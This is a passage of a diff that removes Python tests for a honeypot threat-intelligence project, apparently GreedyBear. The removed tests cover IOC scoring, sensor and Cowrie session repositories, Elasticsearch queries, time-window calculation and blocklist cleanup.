- def test_get_scanners_for_scoring_only_loads_specified_fields(self):
- IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True, attack_count=100)
-
- result = list(self.repo.get_scanners_for_scoring(["recurrence_probability"]))
-
- # Check that our created IOC is in the results
- names = [ioc.name for ioc in result]
- self.assertIn("1.2.3.4", names)
- # Verify name field is accessible (field was loaded)
- test_ioc = next(ioc for ioc in result if ioc.name == "1.2.3.4")
- self.assertEqual(test_ioc.name, "1.2.3.4")
-
- def test_get_scanners_by_pks_returns_correct_iocs(self):
- ioc1 = IOC.objects.create(name="1.2.3.4", type="ip")
- ioc2 = IOC.objects.create(name="5.6.7.8", type="ip")
- IOC.objects.create(name="9.10.11.12", type="ip") # Should not be returned
-
- result = list(self.repo.get_scanners_by_pks({ioc1.pk, ioc2.pk}))
-
- self.assertEqual(len(result), 2)
- values = [r["value"] for r in result]
- self.assertIn("1.2.3.4", values)
- self.assertIn("5.6.7.8", values)
- self.assertNotIn("9.10.11.12", values)
-
- def test_get_scanners_by_pks_includes_honeypot_annotation(self):
- hp = GeneralHoneypot.objects.create(name="TestPot", active=True)
- ioc = IOC.objects.create(name="1.2.3.4", type="ip")
- ioc.general_honeypot.add(hp)
-
- result = list(self.repo.get_scanners_by_pks({ioc.pk}))
-
- self.assertEqual(len(result), 1)
- self.assertIn("honeypots", result[0])
-
- def test_get_recent_scanners_returns_recent_only(self):
- from datetime import datetime, timedelta
-
- recent_date = datetime.now() - timedelta(days=5)
- old_date = datetime.now() - timedelta(days=40)
-
- IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True, last_seen=recent_date)
- IOC.objects.create(name="5.6.7.8", type="ip", scanner=True, cowrie=True, last_seen=old_date)
-
- cutoff = datetime.now() - timedelta(days=30)
- result = list(self.repo.get_recent_scanners(cutoff, days_lookback=30))
-
- values = [r["value"] for r in result]
- self.assertIn("1.2.3.4", values)
- self.assertNotIn("5.6.7.8", values)
-
- def test_get_recent_scanners_excludes_non_scanners(self):
- from datetime import datetime, timedelta
-
- recent_date = datetime.now() - timedelta(days=5)
- IOC.objects.create(name="1.2.3.4", type="ip", scanner=False, cowrie=True, last_seen=recent_date)
-
- cutoff = datetime.now() - timedelta(days=30)
- result = list(self.repo.get_recent_scanners(cutoff))
-
- values = [r["value"] for r in result]
- self.assertNotIn("1.2.3.4", values)
-
- def test_bulk_update_scores_updates_multiple_iocs(self):
- ioc1 = IOC.objects.create(name="1.2.3.4", type="ip", recurrence_probability=0.0)
- ioc2 = IOC.objects.create(name="5.6.7.8", type="ip", recurrence_probability=0.0)
-
- ioc1.recurrence_probability = 0.75
- ioc2.recurrence_probability = 0.85
-
- result = self.repo.bulk_update_scores([ioc1, ioc2], ["recurrence_probability"])
-
- self.assertEqual(result, 2)
- updated1 = IOC.objects.get(name="1.2.3.4")
- updated2 = IOC.objects.get(name="5.6.7.8")
- self.assertEqual(updated1.recurrence_probability, 0.75)
- self.assertEqual(updated2.recurrence_probability, 0.85)
-
- def test_bulk_update_scores_returns_zero_for_empty_list(self):
- result = self.repo.bulk_update_scores([], ["recurrence_probability"])
- self.assertEqual(result, 0)
-
- def test_bulk_update_scores_updates_multiple_fields(self):
- ioc = IOC.objects.create(name="1.2.3.4", type="ip", recurrence_probability=0.0, expected_interactions=0.0)
-
- ioc.recurrence_probability = 0.75
- ioc.expected_interactions = 10.5
-
- result = self.repo.bulk_update_scores([ioc], ["recurrence_probability", "expected_interactions"])
-
- self.assertEqual(result, 1)
- updated = IOC.objects.get(name="1.2.3.4")
- self.assertEqual(updated.recurrence_probability, 0.75)
- self.assertEqual(updated.expected_interactions, 10.5)
-
- # Edge case tests
- def test_get_scanners_for_scoring_returns_empty_when_no_scanners(self):
- # Delete all existing scanners
- IOC.objects.filter(scanner=True).delete()
-
- result = list(self.repo.get_scanners_for_scoring(["recurrence_probability"]))
-
- self.assertEqual(len(result), 0)
-
- def test_get_scanners_for_scoring_excludes_inactive_honeypots(self):
- hp = GeneralHoneypot.objects.create(name="InactivePot", active=False)
- ioc = IOC.objects.create(name="1.2.3.4", type="ip", scanner=True)
- ioc.general_honeypot.add(hp)
-
- result = list(self.repo.get_scanners_for_scoring(["recurrence_probability"]))
-
- names = [ioc.name for ioc in result]
- self.assertNotIn("1.2.3.4", names)
-
- def test_get_scanners_for_scoring_with_multiple_honeypots(self):
- hp1 = GeneralHoneypot.objects.create(name="Pot1", active=True)
- hp2 = GeneralHoneypot.objects.create(name="Pot2", active=True)
- ioc = IOC.objects.create(name="1.2.3.4", type="ip", scanner=True)
- ioc.general_honeypot.add(hp1, hp2)
-
- result = list(self.repo.get_scanners_for_scoring(["recurrence_probability"]))
-
- names = [ioc.name for ioc in result]
- # Should appear only once despite multiple honeypots (distinct)
- self.assertEqual(names.count("1.2.3.4"), 1)
-
- def test_get_scanners_by_pks_with_empty_set(self):
- result = list(self.repo.get_scanners_by_pks(set()))
-
- self.assertEqual(len(result), 0)
-
- def test_get_scanners_by_pks_with_nonexistent_pks(self):
- result = list(self.repo.get_scanners_by_pks({99999, 99998}))
-
- self.assertEqual(len(result), 0)
-
- def test_get_scanners_by_pks_ioc_with_no_honeypots(self):
- ioc = IOC.objects.create(name="1.2.3.4", type="ip")
-
- result = list(self.repo.get_scanners_by_pks({ioc.pk}))
-
- self.assertEqual(len(result), 1)
- self.assertIn("honeypots", result[0])
-
- def test_get_recent_scanners_all_iocs_older_than_cutoff(self):
- from datetime import datetime, timedelta
-
- old_date = datetime.now() - timedelta(days=40)
- IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True, last_seen=old_date)
-
- cutoff = datetime.now() - timedelta(days=30)
- result = list(self.repo.get_recent_scanners(cutoff))
-
- values = [r["value"] for r in result]
- self.assertNotIn("1.2.3.4", values)
-
- def test_get_recent_scanners_with_inactive_honeypot(self):
- from datetime import datetime, timedelta
-
- hp = GeneralHoneypot.objects.create(name="InactivePot", active=False)
- recent_date = datetime.now() - timedelta(days=5)
- ioc = IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, last_seen=recent_date)
- ioc.general_honeypot.add(hp)
-
- cutoff = datetime.now() - timedelta(days=30)
- result = list(self.repo.get_recent_scanners(cutoff))
-
- values = [r["value"] for r in result]
- self.assertNotIn("1.2.3.4", values)
-
- def test_bulk_update_scores_with_custom_batch_size(self):
- ioc1 = IOC.objects.create(name="1.2.3.4", type="ip", recurrence_probability=0.0)
- ioc2 = IOC.objects.create(name="5.6.7.8", type="ip", recurrence_probability=0.0)
-
- ioc1.recurrence_probability = 0.75
- ioc2.recurrence_probability = 0.85
-
- result = self.repo.bulk_update_scores([ioc1, ioc2], ["recurrence_probability"], batch_size=1)
-
- self.assertEqual(result, 2)
- updated1 = IOC.objects.get(name="1.2.3.4")
- updated2 = IOC.objects.get(name="5.6.7.8")
- self.assertEqual(updated1.recurrence_probability, 0.75)
- self.assertEqual(updated2.recurrence_probability, 0.85)
-
-
-class TestScoringIntegration(CustomTestCase):
- """Integration tests for scoring jobs using IocRepository."""
-
- def setUp(self):
- from greedybear.cronjobs.repositories import IocRepository
-
- self.repo = IocRepository()
-
- def test_update_scores_with_repository(self):
- """Test UpdateScores class works with injected repository."""
- import pandas as pd
-
- from greedybear.cronjobs.scoring.scoring_jobs import UpdateScores
-
- # Create test data
- IOC.objects.create(name="10.1.2.3", type="ip", scanner=True, cowrie=True, recurrence_probability=0.0)
- IOC.objects.create(name="10.5.6.7", type="ip", scanner=True, log4j=True, recurrence_probability=0.0)
-
- # Create score dataframe
- df = pd.DataFrame(
- {
- "value": ["10.1.2.3", "10.5.6.7"],
- "recurrence_probability": [0.75, 0.85],
- "expected_interactions": [10.0, 15.0],
- }
- )
-
- # Inject repository and run update
- job = UpdateScores(ioc_repo=self.repo)
- result = job.update_db(df)
-
- # Verify our IOCs were updated (may be more due to test fixtures)
- self.assertGreaterEqual(result, 2)
- updated1 = IOC.objects.get(name="10.1.2.3")
- updated2 = IOC.objects.get(name="10.5.6.7")
- self.assertEqual(updated1.recurrence_probability, 0.75)
- self.assertEqual(updated2.recurrence_probability, 0.85)
-
- def test_update_scores_resets_missing_iocs(self):
- """Test UpdateScores resets scores for IOCs not in the dataframe."""
- import pandas as pd
-
- from greedybear.cronjobs.scoring.scoring_jobs import UpdateScores
-
- # Create test data - one IOC will be missing from df
- IOC.objects.create(name="10.2.3.4", type="ip", scanner=True, cowrie=True, recurrence_probability=0.9)
- IOC.objects.create(name="10.6.7.8", type="ip", scanner=True, log4j=True, recurrence_probability=0.8)
-
- # DataFrame only has one IOC
- df = pd.DataFrame({"value": ["10.2.3.4"], "recurrence_probability": [0.75], "expected_interactions": [10.0]})
-
- job = UpdateScores(ioc_repo=self.repo)
- job.update_db(df)
-
- # First should be updated, second should be reset to 0
- updated1 = IOC.objects.get(name="10.2.3.4")
- updated2 = IOC.objects.get(name="10.6.7.8")
- self.assertEqual(updated1.recurrence_probability, 0.75)
- self.assertEqual(updated2.recurrence_probability, 0.0) # Reset
-
- def test_get_current_data_with_repository(self):
- """Test get_current_data utility function works with repository."""
- from datetime import datetime, timedelta
-
- from greedybear.cronjobs.scoring.utils import get_current_data
-
- recent_date = datetime.now() - timedelta(days=5)
- IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True, last_seen=recent_date)
-
- result = get_current_data(days_lookback=30, ioc_repo=self.repo)
-
- self.assertIsInstance(result, list)
- self.assertGreater(len(result), 0)
- values = [r["value"] for r in result]
- self.assertIn("1.2.3.4", values)
-
- def test_get_data_by_pks_with_repository(self):
- """Test get_data_by_pks utility function works with repository."""
- from greedybear.cronjobs.scoring.utils import get_data_by_pks
-
- ioc = IOC.objects.create(name="1.2.3.4", type="ip")
-
- result = get_data_by_pks({ioc.pk}, ioc_repo=self.repo)
-
- self.assertIsInstance(result, list)
- self.assertEqual(len(result), 1)
- self.assertEqual(result[0]["value"], "1.2.3.4")
-
- def test_update_scores_with_mock_repository(self):
- """Test UpdateScores can be fully mocked for unit testing."""
- from unittest.mock import Mock
-
- import pandas as pd
-
- from greedybear.cronjobs.scoring.scoring_jobs import UpdateScores
-
- # Create mock repository
- mock_repo = Mock()
- mock_ioc = Mock()
- mock_ioc.name = "1.2.3.4"
- mock_ioc.recurrence_probability = 0.0
- mock_repo.get_scanners_for_scoring.return_value = [mock_ioc]
- mock_repo.bulk_update_scores.return_value = 1
-
- # Create score dataframe
- df = pd.DataFrame({"value": ["1.2.3.4"], "recurrence_probability": [0.75], "expected_interactions": [10.0]})
-
- # Inject mock and verify it's used
- job = UpdateScores(ioc_repo=mock_repo)
- result = job.update_db(df)
-
- # Verify repository methods were called
- mock_repo.get_scanners_for_scoring.assert_called_once()
- mock_repo.bulk_update_scores.assert_called_once()
- self.assertEqual(result, 1)
-
-
-class TestSensorRepository(CustomTestCase):
- def setUp(self):
- self.repo = SensorRepository()
-
- def test_sensors_property_returns_cached_sensors(self):
- self.repo.add_sensor("192.168.1.1")
- self.repo.add_sensor("192.168.1.2")
- result = self.repo.sensors
- self.assertEqual(len(result), 2)
- self.assertIn("192.168.1.1", result)
- self.assertIn("192.168.1.2", result)
-
- def test_add_sensor_creates_new_sensor(self):
- result = self.repo.add_sensor("192.168.1.3")
- self.assertTrue(result)
- self.assertTrue(Sensor.objects.filter(address="192.168.1.3").exists())
- self.assertIn("192.168.1.3", self.repo.cache)
-
- def test_add_sensor_returns_false_for_existing_sensor(self):
- self.repo.add_sensor("192.168.1.1")
- result = self.repo.add_sensor("192.168.1.1")
- self.assertFalse(result)
- self.assertEqual(Sensor.objects.filter(address="192.168.1.1").count(), 1)
-
- def test_add_sensor_rejects_non_ip(self):
- result = self.repo.add_sensor("not-an-ip")
- self.assertFalse(result)
- self.assertFalse(Sensor.objects.filter(address="not-an-ip").exists())
-
- def test_add_sensor_rejects_domain(self):
- result = self.repo.add_sensor("example.com")
- self.assertFalse(result)
- self.assertFalse(Sensor.objects.filter(address="example.com").exists())
-
- def test_cache_populated_on_init(self):
- Sensor.objects.create(address="192.168.1.1")
- Sensor.objects.create(address="192.168.1.2")
- repo = SensorRepository()
- self.assertEqual(len(repo.cache), 2)
- self.assertIn("192.168.1.1", repo.cache)
- self.assertIn("192.168.1.2", repo.cache)
-
- def test_add_sensor_updates_cache(self):
- initial_cache_size = len(self.repo.cache)
- self.repo.add_sensor("192.168.1.1")
- self.assertEqual(len(self.repo.cache), initial_cache_size + 1)
-
- def test_add_sensor_accepts_valid_ipv4(self):
- test_ips = ["1.2.3.4", "192.168.1.1", "10.0.0.1", "8.8.8.8"]
- for ip in test_ips:
- result = self.repo.add_sensor(ip)
- self.assertTrue(result)
-
-
-class TestCowrieSessionRepository(CustomTestCase):
- def setUp(self):
- self.repo = CowrieSessionRepository()
-
- def test_get_or_create_session_creates_new(self):
- source_ioc = IOC.objects.create(name="1.2.3.4", type="ip")
- result = self.repo.get_or_create_session(session_id="123456", source=source_ioc)
- self.assertIsNotNone(result)
- self.assertEqual(result.session_id, int("123456", 16))
- self.assertEqual(result.source, source_ioc)
-
- def test_get_or_create_session_returns_existing(self):
- existing_session_id = "ffffffffffff"
- source = self.cowrie_session.source
- result = self.repo.get_or_create_session(existing_session_id, source=source)
- self.assertEqual(result.pk, int(existing_session_id, 16))
- self.assertTrue(result.login_attempt)
-
- def test_get_or_create_raises_on_invalid_session_id(self):
- session_id = "gggggggggggg"
- source = IOC.objects.create(name="1.2.3.4", type="ip")
- with self.assertRaises(ValueError):
- self.repo.get_or_create_session(session_id, source=source)
-
- def test_save_session_persists_to_database(self):
- source_ioc = IOC.objects.create(name="1.2.3.4", type="ip")
- session = CowrieSession(session_id=12345, source=source_ioc)
- result = self.repo.save_session(session)
- self.assertIsNotNone(result.pk)
- self.assertTrue(CowrieSession.objects.filter(session_id=12345).exists())
-
- def test_save_session_updates_existing(self):
- existing_session_id = "ffffffffffff"
- source = self.cowrie_session.source
- session = self.repo.get_or_create_session(existing_session_id, source=source)
-
- original_interaction_count = session.interaction_count
- session.interaction_count = 10
- result = self.repo.save_session(session)
- self.assertEqual(result.interaction_count, 10)
- self.assertEqual(
- CowrieSession.objects.get(session_id=int(existing_session_id, 16)).interaction_count,
- 10,
- )
-
- session.interaction_count = original_interaction_count
- result = self.repo.save_session(session)
- self.assertEqual(result.interaction_count, original_interaction_count)
- self.assertEqual(
- CowrieSession.objects.get(session_id=int(existing_session_id, 16)).interaction_count,
- original_interaction_count,
- )
-
- def test_get_command_sequence_by_hash_returns_existing(self):
- existing = self.command_sequence
- result = self.repo.get_command_sequence_by_hash(existing.commands_hash)
- self.assertIsNotNone(result)
- self.assertEqual(result.pk, existing.pk)
- self.assertEqual(result.commands_hash, existing.commands_hash)
-
- def test_get_command_sequence_by_hash_returns_none_for_missing(self):
- result = self.repo.get_command_sequence_by_hash("nonexistent")
- self.assertIsNone(result)
-
- def test_save_command_sequence_persists_to_database(self):
- cmd_seq = CommandSequence(
- commands=["ls", "pwd", "whoami"],
- commands_hash="def456",
- )
- result = self.repo.save_command_sequence(cmd_seq)
- self.assertIsNotNone(result.pk)
- self.assertTrue(CommandSequence.objects.filter(commands_hash="def456").exists())
-
- def test_save_command_sequence_updates_existing(self):
- existing = self.command_sequence
- existing.last_seen = datetime(2025, 1, 2)
- self.repo.save_command_sequence(existing)
- updated = CommandSequence.objects.get(commands_hash=existing.commands_hash)
- self.assertEqual(updated.last_seen.date(), datetime(2025, 1, 2).date())
-
- def test_get_or_create_session_with_hex_session_id(self):
- session_id = "abc123"
- source_ioc = IOC.objects.create(name="1.2.3.4", type="ip")
- result = self.repo.get_or_create_session(session_id=session_id, source=source_ioc)
- self.assertEqual(result.session_id, int(session_id, 16))
-
- def test_command_sequence_unique_hash_constraint(self):
- existing = self.command_sequence
- with self.assertRaises(IntegrityError):
- CommandSequence.objects.create(
- commands=["different", "commands"],
- commands_hash=existing.commands_hash,
- )
-
-
-class TestElasticRepository(CustomTestCase):
- def setUp(self):
- self.mock_client = Mock()
- self.mock_client.ping.return_value = True
-
- patcher = patch("greedybear.cronjobs.repositories.elastic.settings")
- self.mock_settings = patcher.start()
- self.mock_settings.ELASTIC_CLIENT = self.mock_client
- self.addCleanup(patcher.stop)
-
- self.repo = ElasticRepository()
-
- @patch("greedybear.cronjobs.repositories.elastic.Search")
- def test_has_honeypot_been_hit_returns_true_when_hits_exist(self, mock_search_class):
- mock_search = Mock()
- mock_search_class.return_value = mock_search
- mock_q = Mock()
- with patch.object(self.repo, "_standard_query", return_value=mock_q):
- mock_search.query.return_value = mock_search
- mock_search.filter.return_value = mock_search
- mock_search.count.return_value = 1
-
- result = self.repo.has_honeypot_been_hit(minutes_back_to_lookup=10, honeypot_name="test_honeypot")
- self.assertTrue(result)
- mock_search.query.assert_called_once_with(mock_q)
- mock_search.filter.assert_called_once_with("term", **{"type.keyword": "test_honeypot"})
- mock_search.count.assert_called_once()
-
- @patch("greedybear.cronjobs.repositories.elastic.Search")
- def test_has_honeypot_been_hit_returns_false_when_no_hits(self, mock_search_class):
- mock_search = Mock()
- mock_search_class.return_value = mock_search
- mock_q = Mock()
- with patch.object(self.repo, "_standard_query", return_value=mock_q):
- mock_search.query.return_value = mock_search
- mock_search.filter.return_value = mock_search
- mock_search.count.return_value = 0
-
- result = self.repo.has_honeypot_been_hit(minutes_back_to_lookup=10, honeypot_name="test_honeypot")
-
- self.assertFalse(result)
- mock_search.query.assert_called_once_with(mock_q)
- mock_search.filter.assert_called_once_with("term", **{"type.keyword": "test_honeypot"})
- mock_search.count.assert_called_once()
-
- def test_healthcheck_passes_when_ping_succeeds(self):
- self.mock_client.ping.return_value = True
- self.repo._healthcheck()
- self.mock_client.ping.assert_called_once()
-
- def test_healthcheck_raises_when_ping_fails(self):
- self.mock_client.ping.return_value = False
- with self.assertRaises(ElasticRepository.ElasticServerDownError) as ctx:
- self.repo._healthcheck()
- self.assertIn("not reachable", str(ctx.exception))
-
- @patch("greedybear.cronjobs.repositories.elastic.Search")
- @patch("greedybear.cronjobs.repositories.elastic.LEGACY_EXTRACTION", False)
- def test_search_returns_cached_list_not_generator(self, mock_search_class):
- mock_search = Mock()
- mock_search_class.return_value = mock_search
- mock_search.query.return_value = mock_search
- mock_search.source.return_value = mock_search
-
- mock_hits = [{"name": f"hit{i}", "@timestamp": i} for i in range(20_000)]
- mock_search.scan.return_value = iter(mock_hits)
-
- first_iteration = list(self.repo.search(minutes_back_to_lookup=10))
- second_iteration = list(self.repo.search(minutes_back_to_lookup=10))
- self.assertEqual(len(first_iteration), 20_000)
- self.assertEqual(len(second_iteration), 20_000)
-
- @patch("greedybear.cronjobs.repositories.elastic.Search")
- @patch("greedybear.cronjobs.repositories.elastic.LEGACY_EXTRACTION", False)
- def test_search_returns_ordered_list(self, mock_search_class):
- mock_search = Mock()
- mock_search_class.return_value = mock_search
- mock_search.query.return_value = mock_search
- mock_search.source.return_value = mock_search
-
- mock_hits = [{"name": f"hit{i}", "@timestamp": i % 7} for i in range(20_000)]
- mock_search.scan.return_value = iter(mock_hits)
-
- result = list(self.repo.search(minutes_back_to_lookup=10))
- is_ordered = all(a["@timestamp"] <= b["@timestamp"] for a, b in zip(result, result[1:], strict=False))
- self.assertTrue(is_ordered)
-
- @patch("greedybear.cronjobs.repositories.elastic.Search")
- @patch("greedybear.cronjobs.repositories.elastic.LEGACY_EXTRACTION", True)
- def test_search_legacy_mode_uses_relative_time(self, mock_search_class):
- """Test legacy extraction uses relative time queries"""
- mock_search = Mock()
- mock_search_class.return_value = mock_search
- mock_search.query.return_value = mock_search
- mock_search.source.return_value = mock_search
- mock_search.scan.return_value = iter([])
-
- # Verify query was called (legacy mode uses different query structure)
- self.repo.search(minutes_back_to_lookup=11)
- mock_search.query.assert_called_once()
-
- @patch("greedybear.cronjobs.repositories.elastic.Search")
- @patch("greedybear.cronjobs.repositories.elastic.LEGACY_EXTRACTION", False)
- @patch("greedybear.cronjobs.repositories.elastic.get_time_window")
- def test_search_non_legacy_uses_time_window(self, mock_get_time_window, mock_search_class):
- """Test non-legacy extraction uses get_time_window"""
- mock_search = Mock()
- mock_search_class.return_value = mock_search
- mock_search.query.return_value = mock_search
- mock_search.source.return_value = mock_search
- mock_search.scan.return_value = iter([])
-
- window_start = datetime(2025, 1, 1, 12, 0, 0)
- window_end = datetime(2025, 1, 1, 12, 10, 0)
- mock_get_time_window.return_value = (window_start, window_end)
-
- self.repo.search(minutes_back_to_lookup=10)
-
- mock_get_time_window.assert_called_once()
-
- @patch("greedybear.cronjobs.repositories.elastic.get_time_window")
- @patch("greedybear.cronjobs.repositories.elastic.datetime")
- def test_standard_query_returns_correct_query(self, mock_datetime, mock_get_time_window):
- now = datetime(2023, 1, 1, 0, 0, 0)
- mock_datetime.now.return_value = now
- window_start = "2022-12-31T23:50:00"
- window_end = "2023-01-01T00:00:00"
- mock_get_time_window.return_value = (window_start, window_end)
-
- q = self.repo._standard_query(minutes_back_to_lookup=10)
-
- expected_dict = {"range": {"@timestamp": {"gte": window_start, "lt": window_end}}}
- self.assertEqual(q.to_dict(), expected_dict)
- mock_get_time_window.assert_called_once_with(now, 10)
-
-
-class TestTimeWindowCalculation(CustomTestCase):
- def test_basic_10min_window(self):
- """Test a basic window without custom lookback"""
- reference = datetime(2024, 1, 10, 14, 23) # 14:23
- start, end = get_time_window(reference, lookback_minutes=10, extraction_interval=10)
-
- expected_end = datetime(2024, 1, 10, 14, 20) # 14:20
- expected_start = datetime(2024, 1, 10, 14, 10) # 14:10
-
- self.assertEqual(start, expected_start)
- self.assertEqual(end, expected_end)
-
- def test_with_custom_lookback(self):
- """Test window with custom lookback time"""
- reference = datetime(2024, 1, 10, 14, 23) # 14:23
- start, end = get_time_window(reference, lookback_minutes=15, extraction_interval=10)
-
- expected_end = datetime(2024, 1, 10, 14, 20) # 14:20
- expected_start = datetime(2024, 1, 10, 14, 5) # 14:05
-
- self.assertEqual(start, expected_start)
- self.assertEqual(end, expected_end)
-
- def test_with_custom_extraction_interval(self):
- """Test window with custom extraction interval time"""
- reference = datetime(2024, 1, 10, 14, 23) # 14:23
- start, end = get_time_window(reference, lookback_minutes=15, extraction_interval=15)
-
- expected_end = datetime(2024, 1, 10, 14, 15) # 14:15
- expected_start = datetime(2024, 1, 10, 14, 00) # 14:00
-
- self.assertEqual(start, expected_start)
- self.assertEqual(end, expected_end)
-
- def test_exact_boundary(self):
- """Test behavior when reference time is exactly on a window boundary"""
- reference = datetime(2024, 1, 10, 14, 20) # 14:20 exactly
- start, end = get_time_window(reference, lookback_minutes=10, extraction_interval=10)
-
- expected_end = datetime(2024, 1, 10, 14, 20) # 14:20
- expected_start = datetime(2024, 1, 10, 14, 10) # 14:10
-
- self.assertEqual(start, expected_start)
- self.assertEqual(end, expected_end)
-
- def test_invalid_lookback(self):
- """Test that function raises ValueError for invalid lookback"""
- reference = datetime(2024, 1, 10, 14, 23)
-
- with self.assertRaises(ValueError):
- get_time_window(reference, lookback_minutes=5, extraction_interval=10)
-
- def test_invalid_extraction_interval(self):
- """Test that function raises ValueError for invalid extraction interval"""
- reference = datetime(2024, 1, 10, 14, 23)
-
- with self.assertRaises(ValueError):
- get_time_window(reference, lookback_minutes=10, extraction_interval=9)
-
- def test_day_boundary_crossing(self):
- """Test behavior when window crosses a day boundary"""
- reference = datetime(2024, 1, 11, 0, 5) # 00:00
- start, end = get_time_window(reference, lookback_minutes=10, extraction_interval=10)
-
- expected_end = datetime(2024, 1, 11, 0, 0) # 00:00
- expected_start = datetime(2024, 1, 10, 23, 50) # 23:50 on previous day
-
- self.assertEqual(start, expected_start)
- self.assertEqual(end, expected_end)
-
- def test_large_lookback(self):
- """Test with a large lookback that crosses multiple days"""
- reference = datetime(2024, 1, 10, 14, 23) # 14:23
- start, end = get_time_window(reference, lookback_minutes=60 * 24 * 3, extraction_interval=10)
-
- expected_end = datetime(2024, 1, 10, 14, 20) # 14:20
- expected_start = datetime(2024, 1, 7, 14, 20) # 14:20, 3 days earlier
-
- self.assertEqual(start, expected_start)
- self.assertEqual(end, expected_end)
-
-
-# Phase 2: New repository tests for cleanup, firehol, and mass scanners
-
-
-class TestIocRepositoryCleanup(CustomTestCase):
- """Tests for cleanup-related methods in IocRepository."""
-
- def setUp(self):
- self.repo = IocRepository()
-
- def test_delete_old_iocs_deletes_old_records(self):
- from datetime import datetime, timedelta
-
- old_date = datetime.now() - timedelta(days=40)
- recent_date = datetime.now() - timedelta(days=5)
-
- IOC.objects.create(name="1.2.3.4", type="ip", last_seen=old_date)
- IOC.objects.create(name="5.6.7.8", type="ip", last_seen=recent_date)
-
- cutoff = datetime.now() - timedelta(days=30)
- deleted_count = self.repo.delete_old_iocs(cutoff)
-
- self.assertEqual(deleted_count, 1)
- self.assertFalse(IOC.objects.filter(name="1.2.3.4").exists())
- self.assertTrue(IOC.objects.filter(name="5.6.7.8").exists())
-
- def test_delete_old_iocs_returns_zero_when_none_old(self):
- from datetime import datetime, timedelta
-
- recent_date = datetime.now() - timedelta(days=5)
- IOC.objects.create(name="1.2.3.4", type="ip", last_seen=recent_date)
-
- cutoff = datetime.now() - timedelta(days=30)
- deleted_count = self.repo.delete_old_iocs(cutoff)
-
- self.assertEqual(deleted_count, 0)
-
- def test_update_ioc_reputation_updates_existing(self):
- IOC.objects.create(name="1.2.3.4", type="ip", ip_reputation="")
-
- result = self.repo.update_ioc_reputation("1.2.3.4", "mass scanner")
-
- self.assertTrue(result)
- updated = IOC.objects.get(name="1.2.3.4")
- self.assertEqual(updated.ip_reputation, "mass scanner")
-
- def test_update_ioc_reputation_returns_false_for_missing(self):
- result = self.repo.update_ioc_reputation("9.9.9.9", "mass scanner")
- self.assertFalse(result)
-
-
-class TestCowrieSessionRepositoryCleanup(CustomTestCase):
- """Tests for cleanup-related methods in CowrieSessionRepository."""
-
- def setUp(self):
- self.repo = CowrieSessionRepository()
-
- def test_delete_old_command_sequences(self):
- from datetime import datetime, timedelta
-
- old_date = datetime.now() - timedelta(days=40)
- recent_date = datetime.now() - timedelta(days=5)
-
- CommandSequence.objects.create(commands=["ls"], commands_hash="old_hash", last_seen=old_date)
- CommandSequence.objects.create(commands=["pwd"], commands_hash="recent_hash", last_seen=recent_date)
-
- cutoff = datetime.now() - timedelta(days=30)
- deleted_count = self.repo.delete_old_command_sequences(cutoff)
-
- self.assertEqual(deleted_count, 1)
- self.assertFalse(CommandSequence.objects.filter(commands_hash="old_hash").exists())
- self.assertTrue(CommandSequence.objects.filter(commands_hash="recent_hash").exists())
-
- def test_delete_incomplete_sessions(self):
- source = IOC.objects.create(name="1.2.3.4", type="ip")
-
- CowrieSession.objects.create(session_id=123, source=source, start_time=None)
- CowrieSession.objects.create(session_id=456, source=source, start_time=datetime.now())
-
- deleted_count = self.repo.delete_incomplete_sessions()
-
- self.assertEqual(deleted_count, 1)
- self.assertFalse(CowrieSession.objects.filter(session_id=123).exists())
- self.assertTrue(CowrieSession.objects.filter(session_id=456).exists())
-
- def test_delete_sessions_without_login(self):
- from datetime import datetime, timedelta
-
- source = IOC.objects.create(name="1.2.3.4", type="ip")
- old_date = datetime.now() - timedelta(days=40)
- recent_date = datetime.now() - timedelta(days=5)
-
- # Old session without login
- CowrieSession.objects.create(session_id=111, source=source, start_time=old_date, login_attempt=False)
- # Recent session without login
- CowrieSession.objects.create(session_id=222, source=source, start_time=recent_date, login_attempt=False)
- # Old session with login
- CowrieSession.objects.create(session_id=333, source=source, start_time=old_date, login_attempt=True)
-
- cutoff = datetime.now() - timedelta(days=30)
- deleted_count = self.repo.delete_sessions_without_login(cutoff)
-
- self.assertEqual(deleted_count, 1)
- self.assertFalse(CowrieSession.objects.filter(session_id=111).exists())
- self.assertTrue(CowrieSession.objects.filter(session_id=222).exists())
- self.assertTrue(CowrieSession.objects.filter(session_id=333).exists())
-
- def test_delete_sessions_without_commands(self):
- from datetime import datetime, timedelta
-
- source = IOC.objects.create(name="1.2.3.4", type="ip")
- old_date = datetime.now() - timedelta(days=40)
-
- # Session without commands
- CowrieSession.objects.create(session_id=777, source=source, start_time=old_date)
- # Session with commands
- session_with_cmd = CowrieSession.objects.create(session_id=888, source=source, start_time=old_date)
- cmd_seq = CommandSequence.objects.create(commands=["ls"], commands_hash="hash1")
- session_with_cmd.commands = cmd_seq
- session_with_cmd.save()
-
- cutoff = datetime.now() - timedelta(days=30)
- deleted_count = self.repo.delete_sessions_without_commands(cutoff)
-
- self.assertEqual(deleted_count, 1)
- self.assertFalse(CowrieSession.objects.filter(session_id=777).exists())
- self.assertTrue(CowrieSession.objects.filter(session_id=888).exists())
-
-
-class TestFireHolRepository(CustomTestCase):
- """Tests for FireHolRepository."""
-
- def setUp(self):
- self.repo = FireHolRepository()
-
- def test_get_or_create_creates_new_entry(self):
- entry, created = self.repo.get_or_create("1.2.3.4", "blocklist_de")
-
- self.assertTrue(created)
- self.assertEqual(entry.ip_address, "1.2.3.4")
- self.assertEqual(entry.source, "blocklist_de")
- self.assertTrue(FireHolList.objects.filter(ip_address="1.2.3.4", source="blocklist_de").exists())
-
- def test_get_or_create_returns_existing(self):
- FireHolList.objects.create(ip_address="5.6.7.8", source="greensnow")
-
- entry, created = self.repo.get_or_create("5.6.7.8", "greensnow")
-
- self.assertFalse(created)
- self.assertEqual(entry.ip_address, "5.6.7.8")
- self.assertEqual(FireHolList.objects.filter(ip_address="5.6.7.8", source="greensnow").count(), 1)
-
- def test_cleanup_old_entries_custom_days(self):
- from datetime import datetime, timedelta
-
- old_date = datetime.now() - timedelta(days=65)
- old_entry = FireHolList.objects.create(ip_address="4.4.4.4", source="test")
- FireHolList.objects.filter(pk=old_entry.pk).update(added=old_date)
-
- deleted_count = self.repo.cleanup_old_entries(days=60)
-
